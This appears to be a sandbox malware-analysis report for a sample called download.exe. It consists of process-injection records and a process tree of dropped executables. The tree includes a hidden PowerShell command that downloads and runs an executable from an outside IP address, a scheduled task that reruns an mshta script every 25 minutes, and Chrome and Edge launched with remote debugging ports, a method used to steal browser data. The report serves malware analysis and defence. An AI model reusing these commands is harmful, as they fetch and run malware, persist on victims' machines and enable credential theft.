PID 2068 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
PID 2068 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
PID 1668 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
PID 1668 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
PID 1668 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
PID 3204 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3204 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3204 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1668 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
PID 1668 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
PID 1668 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
PID 2068 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
PID 2068 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
PID 2068 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
PID 5004 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5004 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 2432 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 2432 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 1004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 64 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 64 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 64 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 64 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 64 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 64 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 64 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 64 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 64 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 64 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 64 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 64 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1640 wrote to memory of 64 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff95bb7cc40,0x7ff95bb7cc4c,0x7ff95bb7cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2012 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1944,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2136 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1984,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2464 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3328,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4484 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4572 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4560,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4576 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4508,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4780 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3848,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4976 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4552,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4596 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5208,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4768 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5016,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5000 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4596,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5088 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5356,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5064 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff95bb846f8,0x7ff95bb84708,0x7ff95bb84718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2008 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2512 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2928 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3276 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3272 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3448 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3860 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe

"C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn EVGXOmaAU0L /tr "mshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn EVGXOmaAU0L /tr "mshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd" any_word

C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE

"C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

